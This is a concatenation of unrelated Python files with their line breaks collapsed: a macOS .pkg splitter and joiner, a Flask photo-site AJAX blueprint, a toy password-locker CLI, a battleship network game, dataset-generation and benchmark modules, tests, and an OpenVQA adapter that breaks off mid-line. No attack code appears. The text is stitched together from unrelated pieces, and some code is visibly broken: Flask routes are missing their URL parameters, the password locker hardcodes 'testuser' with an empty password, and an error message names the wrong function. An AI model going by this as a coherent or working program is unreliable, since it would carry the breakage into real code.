utils HASH_FILE_BLOCK_SIZE = 4 * 1024 def _ExtractPayload(payload_path: str, blocks_file_path: str, blocks_dir: str) -> None: """Extracts and splits up the Payload file. Args: payload_path: Path to original payload. blocks_file_path: Path to output block index file. blocks_dir: Path to directory to write blocks into. """ with contextlib.ExitStack() as stack: payload = stack.enter_context(gzip.open(payload_path, "rb")) blocks_file = stack.enter_context(open(blocks_file_path, "w")) def WriteBlock(data): checksum = hashlib.sha1(data).digest().hex() with open(os.path.join(blocks_dir, checksum), "wb") as out: out.write(data) print(checksum, file=blocks_file) while True: header = payload.read(76) WriteBlock(header) (magic, name_length_str, data_length_str) = struct.unpack("6s53x6s11s", header) if magic != b"070707": raise ValueError(f"Invalid CPIO header magic: {magic}.") name_length = int(name_length_str, 8) data_length = int(data_length_str, 8) data = payload.read(name_length + data_length) WriteBlock(data) if data.startswith(b"TRAILER!!"): break def _ExtractXarHeader(xar_path: str, dst_path: str) -> None: """Extracts the XAR binary header from a XAR file.""" with contextlib.ExitStack() as stack: xar = stack.enter_context(open(xar_path, "rb")) header_prefix = xar.read(6) (magic, header_length) = struct.unpack(">4sH", header_prefix) if magic != b"xar!": raise ValueError("Invalid XAR header magic: {magic}.") xar.seek(0) header = xar.read(header_length) out = stack.enter_context(open(dst_path, "wb")) out.write(header) def _FlattenFiles(src_dir: str, dst_dir: str) -> None: for root, _, files in os.walk(src_dir): for file in files: shutil.move(os.path.join(root, file), os.path.join(dst_dir, file)) shutil.rmtree(src_dir) def SplitPkg(pkg_path: str, dst_dir: str, blocks_dir: str) -> None: """Decomposes a pkg file into a pair of directories. Args: pkg_path: Path to input .pkg file. dst_dir: Destination directory. blocks_dir: Directory to write blocks into. Raises: RuntimeError: if called on a system different than OSX. A pkg file is decomposed and stored into 2 directories (`dst_dir`, `blocks_dir`): * `dst_dir/header`: XAR binary header * `dst_dir/toc`: XAR XML table of contents * `dst_dir/files/`: all the files contained in the XAR EXCEPT payload, directories flattened. * `dst_dir/payload`: a list of files in the `blocks_dir/` directory, which if concatenated, produce the `Payload` file * `blocks_dir/`: contains fragments of the gunzip'ed `Payload` file The `Payload` file is decompressed, decomposed into blocks and stored as `blocks_dir/`. For each file in the CPIO archive 2 blocks are created, one for the ASCI header and another for the (file name, file contents) part. The `blocks_dir/` directory can be shared by multiple packages, resulting in common files being stored once only. SplitPkg is implemented using OSX command line tools and will thus run on OSX only. """ if platform.system() != "Darwin": raise RuntimeError("JoinPkg works only on Mac OSX.") utils.EnsureDirExists(dst_dir) utils.EnsureDirExists(blocks_dir) files_root = os.path.join(dst_dir, "files") utils.EnsureDirExists(files_root) tmp_files_root = os.path.join(dst_dir, "_files") utils.EnsureDirExists(tmp_files_root) _ExtractXarHeader(pkg_path, os.path.join(dst_dir, "header")) command = ["xar", "--dump-toc=toc", "-f", pkg_path] subprocess.check_call(command, cwd=dst_dir) command = ["xar", "-x", "-f", pkg_path] subprocess.check_call(command, cwd=tmp_files_root) _FlattenFiles(tmp_files_root, files_root) _ExtractPayload( os.path.join(files_root, "Payload"), os.path.join(dst_dir, "payload"), blocks_dir) os.unlink(os.path.join(files_root, "Payload")) with open(os.path.join(dst_dir, "name"), "w") as f: f.write(os.path.basename(pkg_path)) def _BuildPayload(src_payload_path: str, dst_payload_path: str, blocks_dir: str) -> None: with contextlib.ExitStack() as stack: dst_payload = stack.enter_context(gzip.open(dst_payload_path, "wb")) block_index = stack.enter_context(open(src_payload_path, "r")) for block_hash in block_index: block_hash = block_hash.strip("\n") with open(os.path.join(blocks_dir, block_hash), "rb") as block: shutil.copyfileobj(block, dst_payload) def _XmlChild(node: xml.dom.minidom.Element, name: str) -> xml.dom.minidom.Element: children = node.getElementsByTagName(name) child = children[0] return child def _XmlChildValue(node: xml.dom.minidom.Element, name: str) -> str: text_nodes = _XmlChild(node, name).childNodes return text_nodes[0].data def _SetXmlChildValue(node: xml.dom.minidom.Element, name: str, value: typing.Any) -> None: text_nodes = _XmlChild(node, name).childNodes text_nodes[0].data = str(value) def _SetXmlChildAttribute(node: xml.dom.minidom.Element, name: str, attribute: str, value: typing.Any) -> None: _XmlChild(node, name).setAttribute(attribute, str(value)) def _HashFile(path: str) -> bytes: hasher = hashlib.sha1() with open(path, "rb") as f: while True: block = f.read(HASH_FILE_BLOCK_SIZE) if not block: break hasher.update(block) return hasher.digest() class _BuildTocResult(typing.NamedTuple): toc: bytes file_order: typing.List[str] def _BuildToc(src_toc_path: str, files_dir: str) -> _BuildTocResult: """Creates a new XAR table of contents. Args: src_toc_path: Path to source TOC file. files_dir: Path to directory containing files of this XAR archive. Returns: The new TOC and a sorted list of file names, to be written into the XAR in that specific order. """ file_order = [] dom = xml.dom.minidom.parse(src_toc_path) _SetXmlChildAttribute(dom, "checksum", "style", "sha1") checksum_elem = _XmlChild(dom, "checksum") _SetXmlChildValue(checksum_elem, "offset", 0) _SetXmlChildValue(checksum_elem, "size", hashlib.sha1().digest_size) current_offset = hashlib.sha1().digest_size file_elems = dom.getElementsByTagName("file") for file_elem in file_elems: name = _XmlChildValue(file_elem, "name") file_type = _XmlChildValue(file_elem, "type") if file_type != "file": continue file_path = os.path.join(files_dir, name) size = os.path.getsize(file_path) file_order.append(name) _SetXmlChildValue(file_elem, "offset", current_offset) _SetXmlChildValue(file_elem, "size", size) _SetXmlChildValue(file_elem, "length", size) checksum = _HashFile(file_path).hex() _SetXmlChildValue(file_elem, "archived-checksum", checksum) _SetXmlChildAttribute(file_elem, "archived-checksum", "style", "sha1") _SetXmlChildValue(file_elem, "extracted-checksum", checksum) _SetXmlChildAttribute(file_elem, "extracted-checksum", "style", "sha1") _SetXmlChildAttribute(file_elem, "encoding", "style", "application/octet-stream") current_offset += size return _BuildTocResult(toc=dom.toxml("utf-8"), file_order=file_order) def _BuildHeader(src_header_path: str, toc_size: int, toc_compressed_size: int) -> bytes: with open(src_header_path, "rb") as src_header: header = src_header.read() header = header[:8] + struct.pack(">QQL", toc_compressed_size, toc_size, 1) + header[28:] return header def JoinPkg(src_dir: str, blocks_dir: str, dst_path: str) -> None: # pyformat: disable """Recreates a .pkg file from a pair of directories. Args: src_dir: Directory containing decomposed .pkg file. blocks_dir: Directory containing blocks. dst_path: Path to destination .pkg file. Mode of operation: * Builds and gzip's the `Payload` file. * Creates a new XAR table of contents: * Patches the new size and checksum of the `Payload` file. * Since the size of the `Payload` file likely changed, recalculates the offset of all the other files. * Since most of the files other than `Payload` are small, for simplicity, we don't compress them. Their encoding and checksum has to be adjusted. * Concatenates the XAR header, the XAR table of contents, the checksum of the table of contents and the files. JoinPkg is portable code. """ # pyformat: enable def SrcDir(*components): return os.path.join(src_dir, *components) _BuildPayload(SrcDir("payload"), SrcDir("files", "Payload"), blocks_dir) toc, files_order = _BuildToc(SrcDir("toc"), SrcDir("files")) toc_compressed = zlib.compress(toc) header = _BuildHeader(SrcDir("header"), len(toc), len(toc_compressed)) with open(dst_path, "wb") as dst: dst.write(header) dst.write(toc_compressed) dst.write(hashlib.sha1(toc_compressed).digest()) for file_name in files_order: with open(SrcDir("files", file_name), "rb") as file: shutil.copyfileobj(file, dst) from flask import render_template, Blueprint, jsonify, current_app from flask_login import current_user from noirart.notifications import push_follow_notification, push_collect_notification from noirart.models import User, Notification, Photo ajax_bp = Blueprint('ajax', __name__) @ajax_bp.route('/profile/') def get_profile(user_id): user = User.query.get_or_404(user_id) return render_template('main/profile_popup.html', user=user) @ajax_bp.route('/notifications-count') def notifications_count(): if not current_user.is_authenticated: return jsonify(message='Login required.'), 403 count = Notification.query.with_parent(current_user).filter_by(is_read=False).count() return jsonify(count=count) @ajax_bp.route('//followers-count') def collectors_count(photo_id): photo = Photo.query.get_or_404(photo_id) count = len(photo.collectors) return jsonify(count=count) @ajax_bp.route('/collect/', methods=['POST']) def collect(photo_id): current_app.logger.debug('ajax.py:collect()--->') if not current_user.is_authenticated: return jsonify(message='Login required.'), 403 # if not current_user.confirmed: # return jsonify(message='Confirm account required.'), 400 if not current_user.can('COLLECT'): return jsonify(message='No permission.'), 403 photo = Photo.query.get_or_404(photo_id) if current_user.is_collecting(photo): return jsonify(message='Already collected.'), 400 current_user.collect(photo) if current_user != photo.author and photo.author.receive_collect_notification: push_collect_notification(collector=current_user, photo_id=photo_id, receiver=photo.author) return jsonify(message='Photo collected.') @ajax_bp.route('/uncollect/', methods=['POST']) def uncollect(photo_id): current_app.logger.debug('ajax.py uncollect()') if not current_user.is_authenticated: return jsonify(message='Login required.'), 403 photo = Photo.query.get_or_404(photo_id) if not current_user.is_collecting(photo): return jsonify(message='Not collect yet.'), 400 current_user.uncollect(photo) return jsonify(message='Collect canceled.') from user import User def main(): while True: print("Welcome to password locker!") print('\n') print("Select a code to navigate through: to create new user use 'new: to login to your account 'log or 'ex' to exit") code = input().lower() print('\n') if code == 'new': print('Create Username') created_username = input() print('Create Password') created_user_password = input() print('confirm password') confirm_password = input() while confirm_password != created_user_password: print('Passwords do not match!') print('Enter valid password to match the previous!') created_user_password = input() print('Confirm your password') confirm_password = input() else: print(f'Hurray {created_username}!!, Your account was created successfully!') print('\n') print("Continue to Login") print("Username") entered_username = input() print("Your Password") entered_password = input() while entered_username != created_username or entered_password != created_user_password: print("Invalid username or password!") print("Username") entered_username = input() print("Enter your password") entered_password = input() else: print(f" Welcome {entered_username} to your account!") print('\n') elif code == 'log': print("Welcome!") print("Enter Username") default_username = input() print("Enter your password") default_user_password = input() print('\n') while default_username != 'testuser' or default_user_password != '': print("Wrong Username or Password. Username 'testuser' Password '") print("Username") default_username = input() print("Enter Your Password") default_user_password = input() print('\n') else: print("Logged in successfully!") print('\n') print('\n') elif code == 'ex': breakpoint else: print("Enter valid code to proceed!") if __name__ == '__main__': main() """ Battlesip Game Based on: https://github.com/M0r13n/battleships """ import logging import time import bs_game from battleship.console import console from play_sounds import play_while_running from rich.prompt import IntPrompt, Prompt logging.basicConfig(filename="log.log", level=logging.DEBUG) SFX_INGAME_PATH = "bin/utils/sound/sfx_battleship_soundtrack.wav" def main(): """Game""" # Network setup host = "localhost" port = 5000 last_shot_hit = False last_move = None player_won = False is_server = Prompt.ask("Are you a client or a server? (c/s)").lower()[0] == "s" player_turn = not is_server if not is_server: host = Prompt.ask( "Enter hostname (default: localhost)", default="localhost", show_default=False, ) port = IntPrompt.ask( "Enter port (default: 5000)", default=5000, show_default=False ) with bs_game.Network(host, port, is_server) as net, play_while_running(SFX_INGAME_PATH): # Initialise player_board = bs_game.create_empty_board() enemy_board = bs_game.create_empty_board() bs_game.place_ships(player_board, enemy_board) console.print("Okay, let's start:") bs_game.print_boards(player_board, enemy_board) # Game on while not bs_game.player_lost(player_board): if player_turn: x, y = bs_game.ask_player_for_shot() last_move = bs_game.Shot(x, y, last_shot_hit) net.send(bytes(last_move)) else: console.print("Waiting for enemy's response...") data = net.recv() if not data: player_won = True break enemy_shot = bs_game.Shot.decode(data) # True if enemy hit player last_shot_hit = bs_game.update_player_board(enemy_shot, player_board) if last_move: last_move.last_shot_hit = enemy_shot.last_shot_hit bs_game.update_enemy_board(last_move, enemy_board) bs_game.print_boards(player_board, enemy_board) player_turn = not player_turn if player_won: console.print("You won!") time.sleep(3) else: console.print("You lost!") time.sleep(3) if __name__ == "__main__": main() # -*- coding: utf-8 -*- ''' This translation file adds a __LAYER field to a datasource before translating it Copyright (c) 2012 <> Released under the MIT license: http://opensource.org/licenses/mit-license.php ''' from osgeo import ogr import ogr2osm class LayerTranslation(ogr2osm.TranslationBase): def filter_layer(self, layer): if not layer: return layername = layer.GetName() # Add a __LAYER field field = ogr.FieldDefn('__LAYER', ogr.OFTString) field.SetWidth(len(layername)) layer.CreateField(field) # Set the __LAYER field to the name of the current layer for j in range(layer.GetFeatureCount()): ogrfeature = layer.GetNextFeature() ogrfeature.SetField('__LAYER', layername) layer.SetFeature(ogrfeature) # Reset the layer's read position so features are read later on layer.ResetReading() return layer # -*- coding: utf-8 -*- # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import sys from collectd_pandas.tests.func.main import main ARGV = tuple(sys.argv) if len(ARGV) < 2: ARGV = ( 'unittest2', 'discover', '--locals', '--pattern', 'test_*.py', '--top-level-directory', '.', '--start-directory', './collectd_pandas/tests/func') sys.exit(main(argv=ARGV)) from . import ProgressiveTest import numpy as np from progressivis import Print from progressivis.stats import IdxMax, IdxMin, Max, Min, RandomTable from progressivis.table.stirrer import Stirrer from progressivis.core import aio class TestIdxMax(ProgressiveTest): def tearDown(self): TestIdxMax.cleanup() def test_idxmax(self): s=self.scheduler() random = RandomTable(10, rows=10000,throttle=1000, scheduler=s) idxmax=IdxMax(scheduler=s) idxmax.input[0] = random.output.result max_=Max(scheduler=s) max_.input[0] = random.output.result pr=Print(proc=self.terse, scheduler=s) pr.input[0] = idxmax.output.result aio.run(s.start()) max1 = max_.result #print('max1', max1) max2 = idxmax.max().last().to_dict() #print('max2', max2) self.compare(max1, max2) def test_idxmax2(self): s=self.scheduler() random = RandomTable(10, rows=10000,throttle=1000, scheduler=s) stirrer = Stirrer(update_column='_1', delete_rows=5, fixed_step_size=100, scheduler=s) stirrer.input[0] = random.output.result idxmax=IdxMax(scheduler=s) idxmax.input[0] = stirrer.output.result max_=Max(scheduler=s) max_.input[0] = stirrer.output.result pr=Print(proc=self.terse, scheduler=s) pr.input[0] = idxmax.output.result aio.run(s.start()) #import pdb;pdb.set_trace() max1 = max_.result #print('max1', max1) max2 = idxmax.max().last().to_dict() #print('max2', max2) self.compare(max1, max2) def test_idxmin(self): s=self.scheduler() random = RandomTable(10, rows=10000,throttle=1000, scheduler=s) idxmin=IdxMin(scheduler=s) idxmin.input[0] = random.output.result min_=Min(scheduler=s) min_.input[0] = random.output.result pr=Print(proc=self.terse, scheduler=s) pr.input[0] = idxmin.output.result aio.run(s.start()) min1 = min_.result #print('min1', min1) min2 = idxmin.min().last().to_dict() #print('min2', min2) self.compare(min1, min2) def test_idxmin2(self): s=self.scheduler() random = RandomTable(10, rows=10000,throttle=1000, scheduler=s) stirrer = Stirrer(update_column='_1', delete_rows=5, fixed_step_size=100, scheduler=s) stirrer.input[0] = random.output.result idxmin=IdxMin(scheduler=s) idxmin.input[0] = stirrer.output.result min_=Min(scheduler=s) min_.input[0] = stirrer.output.result pr=Print(proc=self.terse, scheduler=s) pr.input[0] = idxmin.output.result aio.run(s.start()) min1 = min_.result #print('min1', min1) min2 = idxmin.min().last().to_dict() #print('min2', min2) self.compare(min1, min2) def compare(self, res1, res2): v1 = np.array(list(res1.values())) v2 = np.array(list(res2.values())) #print('v1 = ', v1, res1.keys()) #print('v2 = ', v2, res2.keys()) self.assertTrue(np.allclose(v1, v2)) if __name__ == '__main__': ProgressiveTest.main() #!/usr/bin/env python3 # -*- coding: utf-8 -*- """Runs the generator with the configuration specified by the command line args.""" import collections import json import os import random import sys import typing import urllib.request import argmagic import streamtologger from aspwrapper import dlv_solver from countries import config from countries import country from countries import dataset_generator as data_gen __author__ = "" __copyright__ = ( "Copyright (c) 2018, \n" "All rights reserved.\n" "\n" "Redistribution and use in source and binary forms, with or without\n" "modification, are permitted provided that the following conditions are met:\n" "\n" "1. Redistributions of source code must retain the above copyright notice, this\n" " list of conditions and the following disclaimer.\n" "2. Redistributions in binary form must reproduce the above copyright notice,\n" " this list of conditions and the following disclaimer in the documentation\n" " and/or other materials provided with the distribution.\n" "\n" "THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n" "ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n" "WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n" "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n" "ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n" "(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n" "LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n" "ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n" "(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n" "SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." ) __license__ = "BSD-2-Clause" __version__ = "2018.1" __date__ = "Mar 15, 2018" __maintainer__ = "" __email__ = "" __status__ = "Development" APP_DESCRIPTION = ( "This is a tool for generating datasets of reasoning tasks about countries and regions. " "For additional details, have a look at the project repository at " "https://github.com/phohenecker/country-data-gen." ) """str: The help text that is printed for this app if --help is provided.""" APP_NAME = "run-data-gen.sh" """str: The name that is displayed in the synopsis of this app.""" DATA_FILENAME = "countries.json" """str: The filename that is used for storing the data.""" DATA_URL = "https://raw.githubusercontent.com/mledoze/countries/master/countries.json" """str: The URL for downloading the data, which is specified in JSON format.""" LOG_FILE_NAME = "out.log" """str: The filename of the created log file.""" ONTOLOGY = "src/main/asp/ontology.asp" """str: The path to the ASP program that describes the used ontology.""" ISO_CODE_KEY = "cca3" """str: The key that is used to store the ISO 3166-1 alpha-3 code for countries, e.g., 'AUT', in the data file.""" NEIGHBORS_KEY = "borders" """str: The key that is used to store a country's neighbors in the data file.""" REGION_KEY = "region" """str: The key that is used to store a country's region in the data file.""" SUBREGION_KEY = "subregion" """str: The key that is used to store a country's subregion in the data file.""" def _load_data(path: str) -> typing.Dict[str, country.Country]: """Loads the raw data from the provided path. The path is supposed to point to a JSON file that specifies countries and regions in the format that is used in the original `GitHub repository `_. Args: path (str): The path to the JSON file that contains the data. """ # read the provided file with open(path, "r") as f: data = json.load(f) # create mapping from ISO codes to actual (readable) names names = {c[ISO_CODE_KEY]: c["name"]["official"] for c in data} # assemble a dictionary that maps from (ISO code) names to instances of country.Country return collections.OrderedDict( ( ( names[c[ISO_CODE_KEY]], country.Country( c[ISO_CODE_KEY], [names[n] for n in c[NEIGHBORS_KEY]], c[REGION_KEY], None if not c[SUBREGION_KEY] else c[SUBREGION_KEY] ) ) for c in data ) ) def _print_config(conf: config.Config) -> None: """Prints the provided configuration as table to the screen. Args: conf (:class:`config.Config`): The configuration to print. """ # parse and sort the config into (name, value) pairs str_conf = sorted(argmagic.get_config(conf).items(), key=lambda x: x[0]) # compute the maximum (string) lengths of all names and values, respectively max_name_len = max((len(n) for n, _ in str_conf)) max_value_len = max((len(v) for _, v in str_conf)) # assemble a horizontal separator h_line = "=" * (max_name_len + max_value_len + 3) # print the config to the screen print(h_line) print("CONFIGURATION") print(h_line) for name, value in str_conf: print(("{:" + str(max_name_len) + "} : {}").format(name, value)) print(h_line) print() def main(conf: config.Config): # create the output directory if it does not exist yet if not os.path.isdir(conf.output_dir): os.mkdir(conf.output_dir) # set up logging streamtologger.redirect( target=os.path.join(conf.output_dir, LOG_FILE_NAME), print_to_screen=not conf.quiet, header_format="[{timestamp:%Y-%m-%d %H:%M:%S} - {level:5}] ", append=False ) # print command that was used to run this application print("$", APP_NAME, " ".join(sys.argv[1:])) print() # print the provided configuration _print_config(conf) # seed RNG if possible if conf.seed is not None: print("seeding RNG with {}".format(conf.seed)) random.seed(conf.seed) print("OK\n") # look for data, and download it if necessary print("looking for data...") if conf.data is None: data_path = os.path.join(conf.output_dir, DATA_FILENAME) if os.path.isfile(data_path): print("discovered data at '{}'".format(data_path)) else: print("downloading data to '{}'...".format(data_path)) urllib.request.urlretrieve(DATA_URL, data_path) conf.data = data_path print("OK\n") # load the data from disk print("loading data from '{}'...".format(conf.data)) data = _load_data(conf.data) print("found data about {} countries".format(len(data))) print("OK\n") # invoke dataset generator to create the required datasets print( "generating {} dataset{} with {} training sample{}\n".format( conf.num_datasets, "s" if conf.num_datasets > 1 else "", conf.num_training_samples, "s" if conf.num_training_samples > 1 else "" ) ) generator = data_gen.DatasetGenerator( data, conf.setting, dlv_solver.DlvSolver(conf.dlv), ONTOLOGY, conf.class_facts ) generator.generate_datasets(conf.num_datasets, conf.num_training_samples, conf.output_dir) main(argmagic.parse_args(config.Config, app_name=APP_NAME, app_description=APP_DESCRIPTION)) # Copyright 2019 PerfKitBenchmarker Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Runs stress-ng. From the stress-ng ubuntu documentation: stress-ng will stress test a computer system in various selectable ways. It was designed to exercise various physical subsystems of a computer as well as the various operating system kernel interfaces. stress-ng also has a wide range of CPU specific stress tests that exercise floating point, integer, bit manipulation and control flow. stress-ng manpage: http://manpages.ubuntu.com/manpages/xenial/man1/stress-ng.1.html """ import logging import numpy from perfkitbenchmarker import configs from perfkitbenchmarker import flags from perfkitbenchmarker import sample FLAGS = flags.FLAGS BENCHMARK_NAME = 'stress_ng' BENCHMARK_CONFIG = """ stress_ng: description: Runs stress-ng vm_groups: default: vm_spec: *default_single_core disk_spec: *default_50_gb """ flags.DEFINE_integer('stress_ng_duration', 10, 'Number of seconds to run the test.') flags.DEFINE_boolean('stress_ng_calc_geomean', True, 'Whether to calculate geomean or not.') flags.DEFINE_list('stress_ng_custom_stressors', [], 'List of stressors to run against. Default combines cpu,' 'cpu-cache, and memory suites') def _GeoMeanOverflow(iterable): """Returns the geometric mean. See https://en.wikipedia.org/wiki/Geometric_mean#Relationship_with_logarithms Args: iterable: a list of positive floats to take the geometric mean of. Returns: The geometric mean of the list. """ a = numpy.log(iterable) return numpy.exp(a.sum() / len(a)) def StressngCustomStressorsValidator(stressors): """Returns whether or not the list of custom stressors is valid.""" valid_stressors = { 'affinity', 'af-alg', 'aio', 'aio-linux', 'apparmor', 'bigheap', 'brk', 'bsearch', 'cache', 'chdir', 'chmod', 'clock', 'clone', 'context', 'cpu', 'cpu-online', 'crypt', 'daemon', 'dentry', 'dir', 'dup', 'epoll', 'eventfd', 'exec', 'fallocate', 'fault', 'fcntl', 'fiemap', 'fifo', 'filename', 'flock', 'fork', 'fp-error', 'fstat', 'futex', 'get', 'getrandom', 'getdent', 'handle', 'hdd', 'heapsort', 'hsearch', 'icache', 'iosync', 'inotify', 'itimer', 'kcmp', 'key', 'kill', 'klog', 'lease', 'link', 'lockbus', 'lockf', 'longjmp', 'lsearch', 'malloc', 'matrix', 'membarrier', 'memcpy', 'memfd', 'mergesort', 'mincore', 'mknod', 'mlock', 'mmap', 'mmapfork', 'mmapmany', 'mremap', 'msg', 'mq', 'nice', 'null', 'numa', 'oom-pipe', 'open', 'personality', 'pipe', 'poll', 'procfs', 'pthread', 'ptrace', 'qsort', 'quota', 'rdrand', 'readahead', 'remap-file-pages', 'rename', 'rlimit', 'seccomp', 'seek', 'sem-posix', 'sem-sysv', 'shm-posix', 'shm-sysv', 'sendfile', 'sigfd', 'sigfpe', 'sigpending', 'sigq', 'sigsegv', 'sigsuspend', 'sleep', 'socket', 'socket-fd', 'socket-pair', 'spawn', 'splice', 'stack', 'str', 'stream', 'switch', 'symlink', 'sync-file', 'sysinfo', 'sysfs', 'tee', 'timer', 'timerfd', 'tsc', 'tsearch', 'udp', 'udp-flood', 'unshare', 'urandom', 'userfaultfd', 'utime', 'vecmath', 'vfork', 'vm', 'vm-rw', 'vm-splice', 'wait', 'wcs', 'xattr', 'yield', 'zero', 'zlib', 'zombie' } return valid_stressors.issuperset(set(stressors)) def GetConfig(user_config): return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME) def Prepare(benchmark_spec): """Installs stress-ng on the target vm. Args: benchmark_spec: The benchmark specification. Contains all data that is required to run the benchmark. """ vm = benchmark_spec.vms[0] vm.InstallPackages('stress-ng') def _ParseStressngResult(metadata, output): """Returns stress-ng data as a sample. Sample output eg: stress-ng: info: [2566] dispatching hogs: 2 context stress-ng: info: [2566] successful run completed in 5.00s stress-ng: info: [2566] stressor bogo ops real time usr time sys time bogo ops/s bogo ops/s stress-ng: info: [2566] (secs) (secs) (secs) (real time) (usr+sys time) stress-ng: info: [2566] context 22429 5.00 5.49 4.48 4485.82 2249.65 Args: metadata: metadata of the sample. output: the output of the stress-ng benchmark. """ output_list = output.splitlines() output_matrix = [i.split() for i in output_list] if len(output_matrix) != 5: logging.error('output is missing') return '' assert output_matrix[2][-4] == 'bogo' and output_matrix[2][-3] == 'ops/s' assert output_matrix[3][-4] == '(real' and output_matrix[3][-3] == 'time)' line = output_matrix[4] name = line[3] value = float(line[-2]) # parse bogo ops/s (real time) return sample.Sample( metric=name, value=value, unit='bogus_ops_sec', # bogus operations per second metadata=metadata) def Run(benchmark_spec): """Runs stress-ng on the target vm. Args: benchmark_spec: The benchmark specification. Contains all data that is required to run the benchmark. Returns: A list of sample.Sample objects. """ vm = benchmark_spec.vms[0] metadata = { 'duration_sec': FLAGS.stress_ng_duration, 'threads': vm.NumCpusForBenchmark() } # Rather than running stress-ng with --class cpu,cpu-cache,memory all in one # RobustRemoteCommand we run each stressor indivually. The reason is that # RobustRemoteCommand periodically SSHs into the VM, but one of the memory # stressors stresses the VM so much that SSH instantly returns 255, causing # the benchmark to fail completely. cpu_suites = [ 'af-alg', 'bsearch', 'context', 'cpu', 'cpu-online', 'crypt', 'fp-error', 'getrandom', 'heapsort', 'hsearch', 'longjmp', 'lsearch', 'matrix', 'mergesort', 'numa', 'qsort', 'rdrand', 'str', 'stream', 'tsc', 'tsearch', 'vecmath', 'wcs', 'zlib' ] cpu_cache_suites = [ 'bsearch', 'cache', 'heapsort', 'hsearch', 'icache', 'lockbus', 'lsearch', 'malloc', 'matrix', 'membarrier', 'memcpy', 'mergesort', 'qsort', 'str', 'stream', 'tsearch', 'vecmath', 'wcs', 'zlib' ] memory_suites = [ 'bsearch', 'context', 'heapsort', 'hsearch', 'lockbus', 'lsearch', 'malloc', 'matrix', 'membarrier', 'memcpy', 'memfd', 'mergesort', 'mincore', 'null', 'numa', 'oom-pipe', 'pipe', 'qsort', 'stack', 'str', 'stream', 'tsearch', 'vm', 'vm-rw', 'wcs', 'zero', 'zlib' ] stressors = sorted(set(cpu_suites + cpu_cache_suites + memory_suites)) if FLAGS.stress_ng_custom_stressors: stressors = FLAGS.stress_ng_custom_stressors samples = [] values_to_geomean_list = [] for stressor in stressors: cmd = ('stress-ng --{stressor} {numthreads} --metrics-brief ' '-t {duration}'.format(stressor=stressor, numthreads=vm.NumCpusForBenchmark(), duration=FLAGS.stress_ng_duration)) stdout, _ = vm.RemoteCommand(cmd) stressng_sample = _ParseStressngResult(metadata, stdout) if stressng_sample: samples.append(stressng_sample) values_to_geomean_list.append(stressng_sample.value) # Only calculate geomean if each stressors provided a value if FLAGS.stress_ng_calc_geomean and len(values_to_geomean_list) == len( stressors): geomean_metadata = metadata.copy() geomean_metadata['stressors'] = stressors geomean_sample = sample.Sample( metric='STRESS_NG_GEOMEAN', value=_GeoMeanOverflow(values_to_geomean_list), unit='bogus_ops_sec', metadata=geomean_metadata) samples.append(geomean_sample) return samples def Cleanup(benchmark_spec): """Cleans up stress-ng from the target vm. Args: benchmark_spec: The benchmark specification. Contains all data that is required to run the benchmark. """ vm = benchmark_spec.vms[0] vm.Uninstall('stress-ng') kyungjunlee/openvqa # -------------------------------------------------------- # OpenVQA # Written by https://github.com/ParadoxZW # -------------------------------------------------------- import torch.nn as nn import torch from openvqa.core.base_dataset import BaseAdapter from openvqa.utils.make_mask import make_mask class Adapter(BaseAdapter): def __init__(self, __C): super(Adapter, self).__init__(__C) self.__C = __C def relation_embedding(self, f_g): x_min, y_min, x_max, y_max = torch.chunk(f_g, 4, dim=2) # [bs, n_obj, 1] cx = (x_min + x_max) * 0.5 # [bs, n_obj, 1] cy = (y_min + y_max) * 0.5 # [bs, n_obj, 1] w = (x_max - x_min) + 1. # [bs, n_obj, 1] h = (y_max - y_min) + 1. # [bs, n_obj, 1] delta_x = cx - cx.transpose(-1, -2) delta_x = torch.clamp(torch.abs(delta_x / w), min=1e-3) delta_x = torch.log(delta_x) # [bs, n_obj, n_obj] delta_y = cy - cy.transpose(-1, -2) delta_y = torch.clamp(torch.abs(delta_y / h), min=1e-3) delta_y = torch.log(delta_y) # [bs, n_obj, n_obj] delta_w = torch.log(w / w.transpose(-1, -2)) # [bs, n_obj, n_obj] delta_h = torch.log(h / h.transpose(-1, -2)) # [bs, n_obj, n_obj] size = delta_h.size() delta_x = delta_x.view(size[0], size[1], size[2], 1) delta_y = delta_y.view(size[0], size[1], size[2], 1) delta_w = delta_w.view(size[0], size[1], size[2], 1) delta_h = delta_h.view(size[0], size[1], size[2], 1) # [bs, n_obj, n_obj, 1] position_mat = torch.cat( (delta_x, delta_y, delta_w, delta_h), -1) # [bs, n_obj, n_obj, 4] return position_mat def vqa_init(self, __C): imgfeat_linear_size = __C.FEAT_SIZE['vqa']['FRCN_FEAT_SIZE'][1] if __C.USE_BBOX_FEAT: self.bbox_linear = nn.Linear(5, __C.BBOXFEAT_EMB_SIZE) imgfeat_linear_size += __C.BBOXFEAT_EMB_SIZE self.frcn_linear = nn.Linear(imgfeat_linear_size, 